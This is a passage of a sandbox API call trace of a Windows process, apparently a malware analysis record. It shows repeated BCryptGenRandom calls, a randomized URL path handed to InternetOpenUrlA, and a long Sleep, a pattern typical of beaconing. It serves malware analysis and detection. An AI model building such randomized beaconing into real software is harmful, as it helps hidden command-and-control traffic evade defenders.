0x7ffc5bcc36b0 [0171.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4958, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4d4958) returned 0x0 [0172.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.028] GetProcessHeap () returned 0x440000 [0172.028] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0172.028] lstrcpyA (in: lpString1=0x472f30, lpString2="" | out: lpString1="") returned="" [0172.028] lstrcatA (in: lpString1="", lpString2="/NpEwNu8xqxnXmz88awiQ81vj/WUrqw8ynqtpjblarpucag3zfdaY3ndy5/ozep36uC1orwjn9lnAvqw0oiolI9/pfxkjetnsr83sAvYsloWgTcvzovnhtj6dz35rf/" | out: lpString1="/NpEwNu8xqxnXmz88awiQ81vj/WUrqw8ynqtpjblarpucag3zfdaY3ndy5/ozep36uC1orwjn9lnAvqw0oiolI9/pfxkjetnsr83sAvYsloWgTcvzovnhtj6dz35rf/") returned="/NpEwNu8xqxnXmz88awiQ81vj/WUrqw8ynqtpjblarpucag3zfdaY3ndy5/ozep36uC1orwjn9lnAvqw0oiolI9/pfxkjetnsr83sAvYsloWgTcvzovnhtj6dz35rf/" [0172.029] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0172.029] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="/NpEwNu8xqxnXmz88awiQ81vj/WUrqw8ynqtpjblarpucag3zfdaY3ndy5/ozep36uC1orwjn9lnAvqw0oiolI9/pfxkjetnsr83sAvYsloWgTcvzovnhtj6dz35rf/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0172.029] GetProcessHeap () returned 0x440000 [0172.029] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0172.029] GetProcessHeap () returned 0x440000 [0172.029] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4900 | out: hHeap=0x440000) returned 1 [0172.029] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0172.030] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0172.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0172.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0172.031] Sleep (dwMilliseconds=0x13c18) [0172.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0172.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.221] GetProcessHeap () returned 0x440000 [0172.221] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17200 [0172.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17201, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a17201) returned 0x0 [0172.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17226, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a17226) returned 0x0 [0172.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.231] GetProcAddress 